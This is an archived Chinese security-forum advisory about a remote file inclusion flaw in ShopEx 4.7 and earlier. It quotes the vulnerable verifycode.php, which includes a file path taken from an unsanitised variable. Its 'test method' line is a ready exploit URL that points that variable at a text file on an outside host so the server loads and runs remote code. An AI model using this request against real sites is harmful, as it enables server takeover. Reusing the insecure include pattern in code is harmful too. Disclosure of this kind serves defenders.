QQ群:57116771(8群) 114787622(9群) 85090453(仅限女会员) 110511262(10群) 106039353(4群满) 152020046 (6群)
 106042953(寂寞群牛人坐镇菜鸟绕道你问问题没有人回答你) 102388978(IDC 电话商 网盟专员 个人站长 广告服务等加入)[++pow78781++]|发布漏洞|蚂蚁论坛|关于我们

ShopEx4.7及以下版本远程包含漏洞

文档分类:脚本攻防/web apps
发表时间:2010-3-6 20:38:48
漏洞添加:sitedir
阅读关键字:ShopEx漏洞

ShopEx4.7及以下版本远程包含漏洞

ShopEx4.7及以下版本远程包含漏洞
漏洞描述:
verifycode.php

<?php 
/** 
*  
* 登陆验证码生成文件 
*
* @package ShopEx网上商店系统 
* @version 4.6 
* @author ShopEx.cn <> 
* @url  
* @since PHP 4.3 
* @copyright ShopEx.cn 

**/ if (!defined("ISSHOP"))
  {  Header("Location:../index.php");
  exit;
  }
  /* 调用 session 文件 */ include_once($INC_SYSHOMEDIR."include/session.inc.php");    mt_srand((double)microtime() * 1000000);
  /* 生成验证码 */
 $strValidate = mt_rand(1000, 9999);
  session_unregister("RANDOM_CODE");
  session_register("RANDOM_CODE");
  $_SESSION["RANDOM_CODE"] = $strValidate."";
  $verifyImg = newclass("verifyCode", $strValidate);
    /* 输出验证码图片 */
 $verifyImg->Output();
  ?> 
测试方法:
http://www.sitedir.com.cn/shop/verifycode.php?INC_SYSHOMEDIR=http://www.coffly.com/xx.txt?
防治建议:
暂无
请参考官方补丁
ShopEx.cn



Copyright © www.sitedir.com.cn 2006-2012 Email:vini5[at]163.com 鄂ICP备07011048号 |